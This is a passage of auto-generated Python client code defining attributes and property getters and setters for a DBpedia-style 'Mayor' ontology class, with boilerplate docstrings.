self._scene = None
self._best_lap = None
self._shoe_number = None
self._mayor_mandate = None
self._friend = None
self._full_score = None
self._diploma = None
self._active_years_end_year_mgr = None
self._abbeychurch_blessing = None
self._height = None
self._usopen_wins = None
self._bust_size = None
self._cloth_size = None
self._handedness = None
self._philosophical_school = None
self._parliamentary_group = None
self._date_of_burial = None
self._mount = None
self._olympic_games_silver = None
self._nationality = None
self._junior_years_start_year = None
self._relative = None
self._newspaper = None
self._announced_from = None
self._military_branch = None
self._activity = None
self._ethnicity = None
self._state_of_origin = None
self._pole_position = None
self._season_manager = None
self._killed_by = None
self._blood_type = None
self._continental_tournament = None
self._junior_years_end_year = None
self._political_function = None
self._honours = None
self._olympic_games = None
self._hair_color = None
self._foot = None
self._measurements = None
self._hand = None
self._federation = None
self._circumcised = None
self._penis_length = None
self._coemperor = None
self._detractor = None
self._selibr_id = None
self._danse_competition = None
self._sex = None
self._sexual_orientation = None
self._partner = None
self._birth_year = None
self._sports_function = None
self._orcid_id = None
self._election_date = None
self._sport_discipline = None
self._collaboration = None
self._national_team_year = None
self._number_of_run = None
self._spouse_name = None
self._lah_hof = None
self._derived_word = None
self._current_team_manager = None
self._little_pool_record = None
self._bpn_id = None
self._free_danse_score = None
self._project = None
self._active_years = None
self._title_date = None
self._blood_group = None
self._school = None
self._death_place = None
self._victory_percentage_as_mgr = None
self._imposed_danse_competition = None
self._shoot = None
self._education_place = None
self._match_point = None
self._reign_name = None
self._pro_period = None
self._influenced_by = None
self._nla_id = None
self._cousurper = None
self._race_wins = None
self._world_tournament_bronze = None
self._jutsu = None
self._weight = None
self._other_media = None
self._alma_mater = None
self._imposed_danse_score = None
self._known_for = None
self._big_pool_record = None
self._olympic_games_wins = None
self._eye_colour = None
self._world_tournament_silver = None
self._architectural_movement = None
self._mood = None
self._bibsys_id = None
self._iihf_hof = None
self._free_prog_score = None
self._description = None
self._particular_sign = None
self._league_manager = None
self._junior_season = None
self._free_prog_competition = None
self._weapon = None
self._kind_of_criminal = None
self._notable_idea = None
self._player_status = None
self._other_function = None
self._continental_tournament_silver = None
self._career_station = None
self._resting_place_position = None
self._original_danse_competition = None
self._status_manager = None
self._national_tournament = None
self._hometown = None
self._dead_in_fight_place = None
self._continental_tournament_bronze = None
self._victory = None
self._complexion = None
self._citizenship = None
self._start = None
self._tessitura = None
self._start_career = None
self._label = None
self._birth_date = None
self._national_tournament_silver = None
self._other_activity = None
self._linguistics_tradition = None
self._national_tournament_bronze = None
self._escalafon = None
self._sibling = None
self._waist_size = None
self._olympic_games_gold = None
self._general_council = None
self._arrest_date = None
self._team_manager = None
self._birth_sign = None
self._artistic_function = None
self._age = None
self._college = None
self._education = None
self._movie = None
self._achievement = None
self._death_age = None
self._type = None
self._approach = None
self._relation = None
self._victory_as_mgr = None
self._living_place = None
self._copilote = None
self._season = None
self._start_wct = None
self._catch = None
self._id = None
self._feat = None
self._decoration = None
self._case = None
self._sentence = None
self._profession = None
self._retirement_date = None
self._world_tournament = None
self._wife = None
self._allegiance = None
self._active_years_start_date_mgr = None
self._lccn_id = None
self._tattoo = None
self._british_wins = None
self._hip_size = None
self._podium = None
self._seiyu = None
self._player_season = None
self._short_prog_score = None
self._regional_council = None
self._homage = None
self._shoe_size = None
self._signature = None
self._olympic_games_bronze = None
self._danse_score = None
self._id_number = None
self._short_prog_competition = None
self._active_years_start_year_mgr = None
self._wedding_parents_date = None
self._birth_place = None
self._world = None
self._astrological_sign = None
self._eye_color = None
self._networth = None
self._coalition = None
self._national_team_match_point = None
self._national_selection = None
self._agency = None
self._start_wqs = None
self._defeat_as_mgr = None
self._death_year = None
self._world_tournament_gold = None
self._pga_wins = None
self._board = None
self._rid_id = None
self._dead_in_fight_date = None
self._related_functions = None
self._manager_season = None
self._reign = None
self._second = None
self._radio = None
self._full_competition = None
self._free_score_competition = None
self._prefect = None
self._publication = None
self._opponent = None
self._employer = None
self._affair = None
self._body_discovered = None
self._buried_place = None
self._residence = None
self._usurper = None
self._other_occupation = None
self._contest = None
self._active_years_end_date_mgr = None
self._created = None
self._original_danse_score = None
self._end_career = None
self._note_on_resting_place = None
self._army = None
self._active_year = None
self._person_function = None
self._pro_since = None
self._cause_of_death = None
self._dubber = None
self._non_professional_career = None
self._military_function = None
self._patent = None
self._creation_christian_bishop = None
self._piercing = None
self._student = None
self._bad_guy = None
self._influenced = None
self._start_reign = None
self._university = None
self._gym_apparatus = None
self._ideology = None
self._conviction_date = None
self._media = None
self._bnf_id = None
self._pseudonym = None
self._temple_year = None
self._clothing_size = None
self._speciality = None
self._award = None
self._kind_of_criminal_action = None
self._isni_id = None
self._significant_project = None
self._leadership = None
self._death_date = None
self._special_trial = None
self._resting_date = None
self._victim = None
self._has_natural_bust = None
self._masters_wins = None
self._individualised_pnd = None
self._continental_tournament_gold = None
self._orientation = None
self._grave = None
self._resting_place = None
self._abbeychurch_blessing_charge = None
self._handisport = None
self._external_ornament = None
self._third = None
self._film_number = None
self._temple = None
self._end_reign = None
self._national_tournament_gold = None
self._death_cause = None
self.discriminator = None
self.parent = parent
self.viaf_id = viaf_id
self.competition_title = competition_title
self.art_patron = art_patron
self.hair_colour = hair_colour
self.tv_show = tv_show
self.expedition = expedition
self.main_domain = main_domain
self.nndb_id = nndb_id
self.discipline = discipline
self.consecration = consecration
self.salary = salary
self.birth_name = birth_name
self.spouse = spouse
self.scene = scene
self.best_lap = best_lap
self.shoe_number = shoe_number
self.mayor_mandate = mayor_mandate
self.friend = friend
self.full_score = full_score
self.diploma = diploma
self.active_years_end_year_mgr = active_years_end_year_mgr
self.abbeychurch_blessing = abbeychurch_blessing
self.height = height
self.usopen_wins = usopen_wins
self.bust_size = bust_size
self.cloth_size = cloth_size
self.handedness = handedness
self.philosophical_school = philosophical_school
self.parliamentary_group = parliamentary_group
self.date_of_burial = date_of_burial
self.mount = mount
self.olympic_games_silver = olympic_games_silver
self.nationality = nationality
self.junior_years_start_year = junior_years_start_year
self.relative = relative
self.newspaper = newspaper
self.announced_from = announced_from
self.military_branch = military_branch
self.activity = activity
self.ethnicity = ethnicity
self.state_of_origin = state_of_origin
self.pole_position = pole_position
self.season_manager = season_manager
self.killed_by = killed_by
self.blood_type = blood_type
self.continental_tournament = continental_tournament
self.junior_years_end_year = junior_years_end_year
self.political_function = political_function
self.honours = honours
self.olympic_games = olympic_games
self.hair_color = hair_color
self.foot = foot
self.measurements = measurements
self.hand = hand
self.federation = federation
self.circumcised = circumcised
self.penis_length = penis_length
self.coemperor = coemperor
self.detractor = detractor
self.selibr_id = selibr_id
self.danse_competition = danse_competition
self.sex = sex
self.sexual_orientation = sexual_orientation
self.partner = partner
self.birth_year = birth_year
self.sports_function = sports_function
self.orcid_id = orcid_id
self.election_date = election_date
self.sport_discipline = sport_discipline
self.collaboration = collaboration
self.national_team_year = national_team_year
self.number_of_run = number_of_run
self.spouse_name = spouse_name
self.lah_hof = lah_hof
self.derived_word = derived_word
self.current_team_manager = current_team_manager
self.little_pool_record = little_pool_record
self.bpn_id = bpn_id
self.free_danse_score = free_danse_score
self.project = project
self.active_years = active_years
self.title_date = title_date
self.blood_group = blood_group
self.school = school
self.death_place = death_place
self.victory_percentage_as_mgr = victory_percentage_as_mgr
self.imposed_danse_competition = imposed_danse_competition
self.shoot = shoot
self.education_place = education_place
self.match_point = match_point
self.reign_name = reign_name
self.pro_period = pro_period
self.influenced_by = influenced_by
self.nla_id = nla_id
self.cousurper = cousurper
self.race_wins = race_wins
self.world_tournament_bronze = world_tournament_bronze
self.jutsu = jutsu
self.weight = weight
self.other_media = other_media
self.alma_mater = alma_mater
self.imposed_danse_score = imposed_danse_score
self.known_for = known_for
self.big_pool_record = big_pool_record
self.olympic_games_wins = olympic_games_wins
self.eye_colour = eye_colour
self.world_tournament_silver = world_tournament_silver
self.architectural_movement = architectural_movement
self.mood = mood
self.bibsys_id = bibsys_id
self.iihf_hof = iihf_hof
self.free_prog_score = free_prog_score
self.description = description
self.particular_sign = particular_sign
self.league_manager = league_manager
self.junior_season = junior_season
self.free_prog_competition = free_prog_competition
self.weapon = weapon
self.kind_of_criminal = kind_of_criminal
self.notable_idea = notable_idea
self.player_status = player_status
self.other_function = other_function
self.continental_tournament_silver = continental_tournament_silver
self.career_station = career_station
self.resting_place_position = resting_place_position
self.original_danse_competition = original_danse_competition
self.status_manager = status_manager
self.national_tournament = national_tournament
self.hometown = hometown
self.dead_in_fight_place = dead_in_fight_place
self.continental_tournament_bronze = continental_tournament_bronze
self.victory = victory
self.complexion = complexion
self.citizenship = citizenship
self.start = start
self.tessitura = tessitura
self.start_career = start_career
self.label = label
self.birth_date = birth_date
self.national_tournament_silver = national_tournament_silver
self.other_activity = other_activity
self.linguistics_tradition = linguistics_tradition
self.national_tournament_bronze = national_tournament_bronze
self.escalafon = escalafon
self.sibling = sibling
self.waist_size = waist_size
self.olympic_games_gold = olympic_games_gold
self.general_council = general_council
self.arrest_date = arrest_date
self.team_manager = team_manager
self.birth_sign = birth_sign
self.artistic_function = artistic_function
self.age = age
self.college = college
self.education = education
self.movie = movie
self.achievement = achievement
self.death_age = death_age
self.type = type
self.approach = approach
self.relation = relation
self.victory_as_mgr = victory_as_mgr
self.living_place = living_place
self.copilote = copilote
self.season = season
self.start_wct = start_wct
self.catch = catch
if id is not None:
self.id = id
self.feat = feat
self.decoration = decoration
self.case = case
self.sentence = sentence
self.profession = profession
self.retirement_date = retirement_date
self.world_tournament = world_tournament
self.wife = wife
self.allegiance = allegiance
self.active_years_start_date_mgr = active_years_start_date_mgr
self.lccn_id = lccn_id
self.tattoo = tattoo
self.british_wins = british_wins
self.hip_size = hip_size
self.podium = podium
self.seiyu = seiyu
self.player_season = player_season
self.short_prog_score = short_prog_score
self.regional_council = regional_council
self.homage = homage
self.shoe_size = shoe_size
self.signature = signature
self.olympic_games_bronze = olympic_games_bronze
self.danse_score = danse_score
self.id_number = id_number
self.short_prog_competition = short_prog_competition
self.active_years_start_year_mgr = active_years_start_year_mgr
self.wedding_parents_date = wedding_parents_date
self.birth_place = birth_place
self.world = world
self.astrological_sign = astrological_sign
self.eye_color = eye_color
self.networth = networth
self.coalition = coalition
self.national_team_match_point = national_team_match_point
self.national_selection = national_selection
self.agency = agency
self.start_wqs = start_wqs
self.defeat_as_mgr = defeat_as_mgr
self.death_year = death_year
self.world_tournament_gold = world_tournament_gold
self.pga_wins = pga_wins
self.board = board
self.rid_id = rid_id
self.dead_in_fight_date = dead_in_fight_date
self.related_functions = related_functions
self.manager_season = manager_season
self.reign = reign
self.second = second
self.radio = radio
self.full_competition = full_competition
self.free_score_competition = free_score_competition
self.prefect = prefect
self.publication = publication
self.opponent = opponent
self.employer = employer
self.affair = affair
self.body_discovered = body_discovered
self.buried_place = buried_place
self.residence = residence
self.usurper = usurper
self.other_occupation = other_occupation
self.contest = contest
self.active_years_end_date_mgr = active_years_end_date_mgr
self.created = created
self.original_danse_score = original_danse_score
self.end_career = end_career
self.note_on_resting_place = note_on_resting_place
self.army = army
self.active_year = active_year
self.person_function = person_function
self.pro_since = pro_since
self.cause_of_death = cause_of_death
self.dubber = dubber
self.non_professional_career = non_professional_career
self.military_function = military_function
self.patent = patent
self.creation_christian_bishop = creation_christian_bishop
self.piercing = piercing
self.student = student
self.bad_guy = bad_guy
self.influenced = influenced
self.start_reign = start_reign
self.university = university
self.gym_apparatus = gym_apparatus
self.ideology = ideology
self.conviction_date = conviction_date
self.media = media
self.bnf_id = bnf_id
self.pseudonym = pseudonym
self.temple_year = temple_year
self.clothing_size = clothing_size
self.speciality = speciality
self.award = award
self.kind_of_criminal_action = kind_of_criminal_action
self.isni_id = isni_id
self.significant_project = significant_project
self.leadership = leadership
self.death_date = death_date
self.special_trial = special_trial
self.resting_date = resting_date
self.victim = victim
self.has_natural_bust = has_natural_bust
self.masters_wins = masters_wins
self.individualised_pnd = individualised_pnd
self.continental_tournament_gold = continental_tournament_gold
self.orientation = orientation
self.grave = grave
self.resting_place = resting_place
self.abbeychurch_blessing_charge = abbeychurch_blessing_charge
self.handisport = handisport
self.external_ornament = external_ornament
self.third = third
self.film_number = film_number
self.temple = temple
self.end_reign = end_reign
self.national_tournament_gold = national_tournament_gold
self.death_cause = death_cause
@property
def parent(self):
"""Gets the parent of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The parent of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._parent
@parent.setter
def parent(self, parent):
"""Sets the parent of this Mayor.
Description not available # noqa: E501
:param parent: The parent of this Mayor. # noqa: E501
:type: list[object]
"""
self._parent = parent
@property
def viaf_id(self):
"""Gets the viaf_id of this Mayor. # noqa: E501
International authority data from the Online Computer Library Center (OCLC) # noqa: E501
:return: The viaf_id of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._viaf_id
@viaf_id.setter
def viaf_id(self, viaf_id):
"""Sets the viaf_id of this Mayor.
International authority data from the Online Computer Library Center (OCLC) # noqa: E501
:param viaf_id: The viaf_id of this Mayor. # noqa: E501
:type: list[str]
"""
self._viaf_id = viaf_id
@property
def competition_title(self):
"""Gets the competition_title of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The competition_title of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._competition_title
@competition_title.setter
def competition_title(self, competition_title):
"""Sets the competition_title of this Mayor.
Description not available # noqa: E501
:param competition_title: The competition_title of this Mayor. # noqa: E501
:type: list[object]
"""
self._competition_title = competition_title
@property
def art_patron(self):
"""Gets the art_patron of this Mayor. # noqa: E501
An influential, wealthy person who supported an artist, craftsman, a scholar or a noble.. See also # noqa: E501
:return: The art_patron of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._art_patron
@art_patron.setter
def art_patron(self, art_patron):
"""Sets the art_patron of this Mayor.
An influential, wealthy person who supported an artist, craftsman, a scholar or a noble.. See also # noqa: E501
:param art_patron: The art_patron of this Mayor. # noqa: E501
:type: list[object]
"""
self._art_patron = art_patron
@property
def hair_colour(self):
"""Gets the hair_colour of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The hair_colour of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._hair_colour
@hair_colour.setter
def hair_colour(self, hair_colour):
"""Sets the hair_colour of this Mayor.
Description not available # noqa: E501
:param hair_colour: The hair_colour of this Mayor. # noqa: E501
:type: list[str]
"""
self._hair_colour = hair_colour
@property
def tv_show(self):
"""Gets the tv_show of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The tv_show of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._tv_show
@tv_show.setter
def tv_show(self, tv_show):
"""Sets the tv_show of this Mayor.
Description not available # noqa: E501
:param tv_show: The tv_show of this Mayor. # noqa: E501
:type: list[object]
"""
self._tv_show = tv_show
@property
def expedition(self):
"""Gets the expedition of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The expedition of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._expedition
@expedition.setter
def expedition(self, expedition):
"""Sets the expedition of this Mayor.
Description not available # noqa: E501
:param expedition: The expedition of this Mayor. # noqa: E501
:type: list[str]
"""
self._expedition = expedition
@property
def main_domain(self):
"""Gets the main_domain of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The main_domain of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._main_domain
@main_domain.setter
def main_domain(self, main_domain):
"""Sets the main_domain of this Mayor.
Description not available # noqa: E501
:param main_domain: The main_domain of this Mayor. # noqa: E501
:type: list[object]
"""
self._main_domain = main_domain
@property
def nndb_id(self):
"""Gets the nndb_id of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The nndb_id of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._nndb_id
@nndb_id.setter
def nndb_id(self, nndb_id):
"""Sets the nndb_id of this Mayor.
Description not available # noqa: E501
:param nndb_id: The nndb_id of this Mayor. # noqa: E501
:type: list[str]
"""
self._nndb_id = nndb_id
@property
def discipline(self):
"""Gets the discipline of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The discipline of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._discipline
@discipline.setter
def discipline(self, discipline):
"""Sets the discipline of this Mayor.
Description not available # noqa: E501
:param discipline: The discipline of this Mayor. # noqa: E501
:type: list[object]
"""
self._discipline = discipline
@property
def consecration(self):
"""Gets the consecration of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The consecration of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._consecration
@consecration.setter
def consecration(self, consecration):
"""Sets the consecration of this Mayor.
Description not available # noqa: E501
:param consecration: The consecration of this Mayor. # noqa: E501
:type: list[str]
"""
self._consecration = consecration
@property
def salary(self):
"""Gets the salary of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The salary of this Mayor. # noqa: E501
:rtype: list[float]
"""
return self._salary
@salary.setter
def salary(self, salary):
"""Sets the salary of this Mayor.
Description not available # noqa: E501
:param salary: The salary of this Mayor. # noqa: E501
:type: list[float]
"""
self._salary = salary
@property
def birth_name(self):
"""Gets the birth_name of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The birth_name of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._birth_name
@birth_name.setter
def birth_name(self, birth_name):
"""Sets the birth_name of this Mayor.
Description not available # noqa: E501
:param birth_name: The birth_name of this Mayor. # noqa: E501
:type: list[str]
"""
self._birth_name = birth_name
@property
def spouse(self):
"""Gets the spouse of this Mayor. # noqa: E501
the person they are married to # noqa: E501
:return: The spouse of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._spouse
@spouse.setter
def spouse(self, spouse):
"""Sets the spouse of this Mayor.
the person they are married to # noqa: E501
:param spouse: The spouse of this Mayor. # noqa: E501
:type: list[object]
"""
self._spouse = spouse
@property
def scene(self):
"""Gets the scene of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The scene of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._scene
@scene.setter
def scene(self, scene):
"""Sets the scene of this Mayor.
Description not available # noqa: E501
:param scene: The scene of this Mayor. # noqa: E501
:type: list[str]
"""
self._scene = scene
@property
def best_lap(self):
"""Gets the best_lap of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The best_lap of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._best_lap
@best_lap.setter
def best_lap(self, best_lap):
"""Sets the best_lap of this Mayor.
Description not available # noqa: E501
:param best_lap: The best_lap of this Mayor. # noqa: E501
:type: list[str]
"""
self._best_lap = best_lap
@property
def shoe_number(self):
"""Gets the shoe_number of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The shoe_number of this Mayor. # noqa: E501
:rtype: list[int]
"""
return self._shoe_number
@shoe_number.setter
def shoe_number(self, shoe_number):
"""Sets the shoe_number of this Mayor.
Description not available # noqa: E501
:param shoe_number: The shoe_number of this Mayor. # noqa: E501
:type: list[int]
"""
self._shoe_number = shoe_number
@property
def mayor_mandate(self):
"""Gets the mayor_mandate of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The mayor_mandate of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._mayor_mandate
@mayor_mandate.setter
def mayor_mandate(self, mayor_mandate):
"""Sets the mayor_mandate of this Mayor.
Description not available # noqa: E501
:param mayor_mandate: The mayor_mandate of this Mayor. # noqa: E501
:type: list[str]
"""
self._mayor_mandate = mayor_mandate
@property
def friend(self):
"""Gets the friend of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The friend of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._friend
@friend.setter
def friend(self, friend):
"""Sets the friend of this Mayor.
Description not available # noqa: E501
:param friend: The friend of this Mayor. # noqa: E501
:type: list[object]
"""
self._friend = friend
@property
def full_score(self):
"""Gets the full_score of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The full_score of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._full_score
@full_score.setter
def full_score(self, full_score):
"""Sets the full_score of this Mayor.
Description not available # noqa: E501
:param full_score: The full_score of this Mayor. # noqa: E501
:type: list[str]
"""
self._full_score = full_score
@property
def diploma(self):
"""Gets the diploma of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The diploma of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._diploma
@diploma.setter
def diploma(self, diploma):
"""Sets the diploma of this Mayor.
Description not available # noqa: E501
:param diploma: The diploma of this Mayor. # noqa: E501
:type: list[object]
"""
self._diploma = diploma
@property
def active_years_end_year_mgr(self):
"""Gets the active_years_end_year_mgr of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The active_years_end_year_mgr of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._active_years_end_year_mgr
@active_years_end_year_mgr.setter
def active_years_end_year_mgr(self, active_years_end_year_mgr):
"""Sets the active_years_end_year_mgr of this Mayor.
Description not available # noqa: E501
:param active_years_end_year_mgr: The active_years_end_year_mgr of this Mayor. # noqa: E501
:type: list[str]
"""
self._active_years_end_year_mgr = active_years_end_year_mgr
@property
def abbeychurch_blessing(self):
"""Gets the abbeychurch_blessing of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The abbeychurch_blessing of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._abbeychurch_blessing
@abbeychurch_blessing.setter
def abbeychurch_blessing(self, abbeychurch_blessing):
"""Sets the abbeychurch_blessing of this Mayor.
Description not available # noqa: E501
:param abbeychurch_blessing: The abbeychurch_blessing of this Mayor. # noqa: E501
:type: list[str]
"""
self._abbeychurch_blessing = abbeychurch_blessing
@property
def height(self):
"""Gets the height of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The height of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._height
@height.setter
def height(self, height):
"""Sets the height of this Mayor.
Description not available # noqa: E501
:param height: The height of this Mayor. # noqa: E501
:type: list[object]
"""
self._height = height
@property
def usopen_wins(self):
"""Gets the usopen_wins of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The usopen_wins of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._usopen_wins
@usopen_wins.setter
def usopen_wins(self, usopen_wins):
"""Sets the usopen_wins of this Mayor.
Description not available # noqa: E501
:param usopen_wins: The usopen_wins of this Mayor. # noqa: E501
:type: list[object]
"""
self._usopen_wins = usopen_wins
@property
def bust_size(self):
"""Gets the bust_size of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The bust_size of this Mayor. # noqa: E501
:rtype: list[float]
"""
return self._bust_size
@bust_size.setter
def bust_size(self, bust_size):
"""Sets the bust_size of this Mayor.
Description not available # noqa: E501
:param bust_size: The bust_size of this Mayor. # noqa: E501
:type: list[float]
"""
self._bust_size = bust_size
@property
def cloth_size(self):
"""Gets the cloth_size of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The cloth_size of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._cloth_size
@cloth_size.setter
def cloth_size(self, cloth_size):
"""Sets the cloth_size of this Mayor.
Description not available # noqa: E501
:param cloth_size: The cloth_size of this Mayor. # noqa: E501
:type: list[str]
"""
self._cloth_size = cloth_size
@property
def handedness(self):
"""Gets the handedness of this Mayor. # noqa: E501
an attribute of humans defined by their unequal distribution of fine motor skill between the left and right hands. # noqa: E501
:return: The handedness of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._handedness
@handedness.setter
def handedness(self, handedness):
"""Sets the handedness of this Mayor.
an attribute of humans defined by their unequal distribution of fine motor skill between the left and right hands. # noqa: E501
:param handedness: The handedness of this Mayor. # noqa: E501
:type: list[object]
"""
self._handedness = handedness
@property
def philosophical_school(self):
"""Gets the philosophical_school of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The philosophical_school of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._philosophical_school
@philosophical_school.setter
def philosophical_school(self, philosophical_school):
"""Sets the philosophical_school of this Mayor.
Description not available # noqa: E501
:param philosophical_school: The philosophical_school of this Mayor. # noqa: E501
:type: list[object]
"""
self._philosophical_school = philosophical_school
@property
def parliamentary_group(self):
"""Gets the parliamentary_group of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The parliamentary_group of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._parliamentary_group
@parliamentary_group.setter
def parliamentary_group(self, parliamentary_group):
"""Sets the parliamentary_group of this Mayor.
Description not available # noqa: E501
:param parliamentary_group: The parliamentary_group of this Mayor. # noqa: E501
:type: list[str]
"""
self._parliamentary_group = parliamentary_group
@property
def date_of_burial(self):
"""Gets the date_of_burial of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The date_of_burial of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._date_of_burial
@date_of_burial.setter
def date_of_burial(self, date_of_burial):
"""Sets the date_of_burial of this Mayor.
Description not available # noqa: E501
:param date_of_burial: The date_of_burial of this Mayor. # noqa: E501
:type: list[str]
"""
self._date_of_burial = date_of_burial
@property
def mount(self):
"""Gets the mount of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The mount of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._mount
@mount.setter
def mount(self, mount):
"""Sets the mount of this Mayor.
Description not available # noqa: E501
:param mount: The mount of this Mayor. # noqa: E501
:type: list[str]
"""
self._mount = mount
@property
def olympic_games_silver(self):
"""Gets the olympic_games_silver of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The olympic_games_silver of this Mayor. # noqa: E501
:rtype: list[int]
"""
return self._olympic_games_silver
@olympic_games_silver.setter
def olympic_games_silver(self, olympic_games_silver):
"""Sets the olympic_games_silver of this Mayor.
Description not available # noqa: E501
:param olympic_games_silver: The olympic_games_silver of this Mayor. # noqa: E501
:type: list[int]
"""
self._olympic_games_silver = olympic_games_silver
@property
def nationality(self):
"""Gets the nationality of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The nationality of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._nationality
@nationality.setter
def nationality(self, nationality):
"""Sets the nationality of this Mayor.
Description not available # noqa: E501
:param nationality: The nationality of this Mayor. # noqa: E501
:type: list[object]
"""
self._nationality = nationality
@property
def junior_years_start_year(self):
"""Gets the junior_years_start_year of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The junior_years_start_year of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._junior_years_start_year
@junior_years_start_year.setter
def junior_years_start_year(self, junior_years_start_year):
"""Sets the junior_years_start_year of this Mayor.
Description not available # noqa: E501
:param junior_years_start_year: The junior_years_start_year of this Mayor. # noqa: E501
:type: list[str]
"""
self._junior_years_start_year = junior_years_start_year
@property
def relative(self):
"""Gets the relative of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The relative of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._relative
@relative.setter
def relative(self, relative):
"""Sets the relative of this Mayor.
Description not available # noqa: E501
:param relative: The relative of this Mayor. # noqa: E501
:type: list[object]
"""
self._relative = relative
@property
def newspaper(self):
"""Gets the newspaper of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The newspaper of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._newspaper
@newspaper.setter
def newspaper(self, newspaper):
"""Sets the newspaper of this Mayor.
Description not available # noqa: E501
:param newspaper: The newspaper of this Mayor. # noqa: E501
:type: list[object]
"""
self._newspaper = newspaper
@property
def announced_from(self):
"""Gets the announced_from of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The announced_from of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._announced_from
@announced_from.setter
def announced_from(self, announced_from):
"""Sets the announced_from of this Mayor.
Description not available # noqa: E501
:param announced_from: The announced_from of this Mayor. # noqa: E501
:type: list[object]
"""
self._announced_from = announced_from
@property
def military_branch(self):
"""Gets the military_branch of this Mayor. # noqa: E501
The service branch (Army, Navy, etc.) a person is part of. # noqa: E501
:return: The military_branch of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._military_branch
@military_branch.setter
def military_branch(self, military_branch):
"""Sets the military_branch of this Mayor.
The service branch (Army, Navy, etc.) a person is part of. # noqa: E501
:param military_branch: The military_branch of this Mayor. # noqa: E501
:type: list[object]
"""
self._military_branch = military_branch
@property
def activity(self):
"""Gets the activity of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The activity of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._activity
@activity.setter
def activity(self, activity):
"""Sets the activity of this Mayor.
Description not available # noqa: E501
:param activity: The activity of this Mayor. # noqa: E501
:type: list[object]
"""
self._activity = activity
@property
def ethnicity(self):
"""Gets the ethnicity of this Mayor. # noqa: E501
Μία ορισμένη κοινωνική κατηγορία ανθρώπων που έχουν κοινή καταγωγή ή εμπειρίες. # noqa: E501
:return: The ethnicity of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._ethnicity
@ethnicity.setter
def ethnicity(self, ethnicity):
"""Sets the ethnicity of this Mayor.
Μία ορισμένη κοινωνική κατηγορία ανθρώπων που έχουν κοινή καταγωγή ή εμπειρίες. # noqa: E501
:param ethnicity: The ethnicity of this Mayor. # noqa: E501
:type: list[object]
"""
self._ethnicity = ethnicity
@property
def state_of_origin(self):
"""Gets the state_of_origin of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The state_of_origin of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._state_of_origin
@state_of_origin.setter
def state_of_origin(self, state_of_origin):
"""Sets the state_of_origin of this Mayor.
Description not available # noqa: E501
:param state_of_origin: The state_of_origin of this Mayor. # noqa: E501
:type: list[object]
"""
self._state_of_origin = state_of_origin
@property
def pole_position(self):
"""Gets the pole_position of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The pole_position of this Mayor. # noqa: E501
:rtype: list[int]
"""
return self._pole_position
@pole_position.setter
def pole_position(self, pole_position):
